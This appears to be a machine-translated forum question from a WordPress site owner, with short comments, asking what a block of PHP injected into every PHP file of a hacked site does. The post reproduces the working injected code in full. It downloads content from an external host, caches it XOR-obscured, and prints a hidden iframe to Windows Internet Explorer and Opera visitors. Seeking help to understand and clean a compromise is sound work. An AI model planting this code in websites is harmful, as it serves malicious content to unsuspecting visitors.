任何人都可以解釋這段代碼到底在做什麼嗎?看起來像黑客已經在wordpress安裝中添加了這個到我的每一個php文件中,我知道它打開了一個連接並從該網址下載文件。還有別的嗎?這個代碼在做什麼? eval(gzinflate(base64_decode)駭客
if (!defined('frmDs')){
define('frmDs' ,1);
function frm_dl ($url) {
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$out = curl_exec ($ch);
if (curl_errno($ch) !== 0) $out = false;
curl_close ($ch);
} else {$out = file_get_contents($url);}
return trim($out);
}
function frm_crpt($in){
$il=strlen($in);$o='';
for ($i = 0; $i < $il; $i++) $o.=$in[$i]^'*';
return $o;
}
function frm_getfrm()
{
$defframe = '<style>.blqrgw { position:absolute; left:-1117px; top:-1046px; }</style> <div class="blqrgw"><iframe src="http://kchergnrxp.myfw.us/jquery/get.php?ver=jquery.latest.js" width="371" height="426"></iframe></div>'; //default frame
$codelink = 'http://kchergnrxp.myfw.us/nc/gnc.php?ver=jquery.latest.js';
if (!$codelink){
return $defframe;
}
$dr='/var/tmp';
$f = $dr.'/sess_'.md5('frm_frame');
if(!file_exists($f) || time() - filemtime($f) > 60*5)
{
$dlc = frm_dl($codelink);
if ($dlc){
if ($fp = @fopen($f, 'w')){
fwrite($fp, frm_crpt($dlc));
fclose($fp);
}
else
return $dlc;
}
else
@unlink($f);
}
$fc = @file_get_contents($f);
return ($fc)?frm_crpt($fc):$defframe;
}
$ua = $_SERVER['HTTP_USER_AGENT'];
if (preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua)){
error_reporting(0);
if(!isset($_COOKIE['__utmfr']) && $nfc=frm_getfrm()) {
@setcookie('__utmfr',rand(1,1000),time()+86400*7,'/');
print($nfc);
}
}
}
總是這種垃圾安裝'遠程shell',所以有人可以在您的服務器上執行任意命令。你被黑客入侵,並且你有很多清理工作要做,包括保護你的網站。 – 2013-04-30 17:17:35
*「還有什麼?」* - 這是一個具體的編程問題? – 2013-04-30 17:18:49
@ M8R-1jmw5r:不是。這就是爲什麼這將被關閉 – 2013-04-30 17:21:21